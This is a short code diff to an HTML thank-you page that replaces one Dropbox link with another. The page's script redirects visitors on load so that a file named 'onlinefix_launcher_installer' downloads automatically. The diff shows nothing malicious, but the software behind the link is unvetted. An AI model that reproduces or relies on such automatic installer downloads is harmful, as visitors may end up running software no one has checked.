--- a/pages/ofmeThanks_en.html
+++ b/pages/ofmeThanks_en.html
@@ -68,7 +68,7 @@
         </div>
     </div>
     <script>
-        window.location.href = "https://www.dropbox.com/scl/fi/nb6fuwtuhm5kr6hxu4krx/onlinefix_launcher_installer?rlkey=xwyz6uefj6q7xdh9v2u4gg3qk&st=613iquvb&dl=1";
+        window.location.href = "https://www.dropbox.com/scl/fi/f5gr2q3sd8ec3vhuw4f59/onlinefix_launcher_installer?rlkey=r8mczqj94ozgkeokf7vb8a5to&st=fek8ojij&dl=1";
     </script>
 </body>
 </html>
